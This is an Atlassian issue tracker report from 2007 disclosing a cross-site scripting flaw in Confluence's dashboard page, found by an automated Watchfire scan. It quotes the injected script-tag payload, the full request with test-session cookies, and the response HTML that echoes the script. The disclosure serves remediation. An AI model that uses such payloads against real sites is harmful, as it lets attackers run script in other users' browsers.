Cross-site scripting vulnerability in /dashboard.action

2007-09-25T20:45:01
ID ATLASSIAN:CONFSERVER-9559
Type atlassian
Reporter marois
Modified 2017-02-17T05:09:55

Description

The test successfully embedded a script in the response, which will be executed once the page is loaded in the user's browser. This means that the application is vulnerable to the Cross-Site Scripting attack.

[1 of 3] Cross-Site Scripting in Parameter Name Severity: High Test Type: Application Vulnerable URL: http://xxx.yyy.com:8080/dashboard.action Remediation Tasks: Filter out hazardous characters from user input Variant 1 of 2 [ID=2465] The following changes were applied to the original request: • Added parameter '>'"><script>alert('Watchfire%20XSS%20Test%20Successful')</script>' Request/Response: GET /dashboard.action?>'"><script>alert('Watchfire%20XSS%20Test%20Successful') </script> HTTP/1.1 Cookie: seraph.confluence=Zh\hNiQi[hZiOf]fOm\fOfUgSfZfWkYkWk; confluence.list.pages.cookie=list-recently-updated; confluence.browse.space.cookie=space-pages; JSESSIONID=4DAEC007BFA3515EC02547862F6B66E4 Accept: / Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 1.0.3705; InfoPath.1; .NET CLR 2.0.50727) Host: xxx.yyyy.com:8080 Connection: Keep-Alive HTTP/1.1 200 OK Content-Length: 46506 Server: Apache-Coyote/1.1 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Date: Wed, 22 Aug 2007 13:48:24 GMT <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Dashboard - MRLwiki TEST</title> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="-1"> <script language="javascript"> var contextPath = ''; var i18n = []; </script> <link rel="stylesheet" href="/s/809/1/1//styles/mainaction. css" type="text/css" /> <link rel="shortcut icon" href="/images/icons/favicon.ico"> <link rel="icon" type="image/png" href="/images/icons/favicon.png"> <script type="text/javascript" src="/s/809/1//decorators/effects.js"></script> 9/18/2007 1:55:06 PM 23/7570 <link rel="alternate" type="application/rss+xml" title="Dashboard RSS Feed" href="/spaces/createrssfeed.action? types=page&types=blogpost&types=comment&spaces=&sort=modified&title=Dashboard+RSS+Fe ed&maxResults=15&publicFeed=false&os_authType=basic&rssType=rss2" /> <link rel="alternate" type="application/atom+xml" title="Dashboard RSS Feed" href="/spaces/createrssfeed.action? types=page&types=blogpost&types=comment&spaces=&sort=modified&title=Dashboard+RSS+Fe ed&maxResults=15&publicFeed=false&os_authType=basic&rssType=atom" /> <script type="text/javascript" src="/scripts/write.js"></script> </head> <body onload="placeFocus()"> <script type="text/javascript"> function hideMessage(messageId) { var message = document.getElementById(messageId) message.style.display = "none"; setCookie(messageId, true); } </script> <div id="PageContent"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr class="topBar"> <td align="left" width="85%"> <a href="/homepage.action"><img src="/download/userResources/logo" align="absmiddle" border="0"></a>  <span class="topBarDiv"> Dashboard </span> </td> <td align="right" valign="middle" style="white-space:nowrap"> <form method="POST" action="/dosearchsite.action" name="searchForm" style="padding: 1px; margin: 1px"> <input type="hidden" name="quickSearch" value="true" /> <input type="hidden" name="searchQuery.spaceKey" value="conf_global" /> <input type="text" accessKey="s" name="searchQuery.queryString" size="25"/> <input type="submit" value="Search"/> </form> </td> </tr> <tr> <td style="padding: 5px" colspan="2"> <table style="padding: 0px; margin: 0px 5px; width: 100%;" cellspacing="0" cellpadding="1" border="0"> <tr> 9/18/2007 1:55:06 PM 24/7570 <td valign="bottom" align="left" width="1%" nowrap>  <span class="logoSpaceLink">   </span> </td> <td align="right" valign="top" width="98%"> <span class="smalltext" id="userNavBar"> Welcome <a href="/display/~VULNSCAN"></a> | <a href="/users/viewuserprofile.action? username=VULNSCAN">Preferences</a> | <a href="/logout.action" id="logout">Log Out</a>  </span> ... Validation In Response: • Spaces: <li><a href="#" onClick="gotoUrl('/dashboard.action?>'"> <script>alert('Watchfire XSS Test Successful')</script>=&spacesSelectedTab=my'); return false;">My</a></li> <li><a href="# Reasoning: The test successfully embedded a script in the response, which will be executed once the page is loaded in the user's browser. This means that the application is vulnerable to the Cross-Site Scripting attack.